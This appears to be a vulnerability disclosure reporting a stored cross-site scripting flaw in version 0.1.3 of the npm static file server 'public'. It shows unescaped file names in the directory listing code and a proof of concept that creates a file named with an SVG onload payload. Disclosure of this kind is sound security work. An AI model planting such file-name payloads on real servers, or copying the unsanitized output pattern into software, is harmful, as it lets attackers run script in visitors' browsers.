I would like to report a Stored XSS issue in module public
It allows executing malicious javascript code in the user’s browser.
module name: publicversion:0.1.3npm page: https://www.npmjs.com/package/public
Run static file hosting server with specified public dir & port. Support a “direcotry index” like Apache httpd.
This issue happens because of the lack of output sanitization here:
files.forEach(function(file) {
list.push('<li><a href>', file, '</a></li>');
});
$ npm i public
$ ./node_modules/public/bin/public ./ 6060
"><svg onload=alert(3);
bash$ touch '"><svg onload=alert(3);'
{F278745}
It allows executing malicious javascript code in the user’s browser
It allows executing malicious javascript code in the user’s browser.